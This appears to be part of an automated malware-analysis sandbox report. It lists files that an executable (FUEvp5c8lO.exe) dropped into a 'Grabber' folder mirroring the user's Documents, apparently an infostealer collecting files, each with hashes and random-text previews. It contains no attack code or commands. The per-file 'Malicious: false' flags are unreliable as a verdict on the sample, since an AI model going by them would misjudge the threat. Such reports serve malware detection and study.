Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\MNULNCRIYC.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\MNULNCRIYC.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\MNULNCRIYC\DTBZGIOOSO.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\MNULNCRIYC\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\MNULNCRIYC\MNULNCRIYC.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\MNULNCRIYC\VLZDGUKUTZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\MNULNCRIYC\ZSSZYEFYMU.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
